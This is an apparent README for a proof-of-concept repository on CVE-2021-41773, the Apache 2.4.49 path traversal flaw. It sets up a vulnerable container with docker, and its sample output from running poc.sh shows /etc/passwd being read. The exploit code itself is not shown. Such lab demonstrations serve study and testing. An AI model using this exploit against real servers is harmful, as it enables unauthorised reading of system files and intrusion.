# CVE-2021-41773-PoC
PoC for CVE-2021-41773 with docker to demonstrate
# Run
Just run `./poc.sh`. Make sure you have working `docker` and `docker-compose`
```
$ ./poc.sh
Creating network "cve-2021-41773-poc_default" with the default driver
Creating cve-2021-41773-poc_web_1 ... done
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
```
# Affected versions
Apache 2.4.49
[4.0K] /data/pocs/552173882d352524cde4e8d5fab94b5a7a157070
├── [ 127] docker-compose.yml
├── [ 112] Dockerfile
├── [ 11K] LICENSE
├── [ 264] poc.sh
└── [ 477] README.md
0 directories, 5 files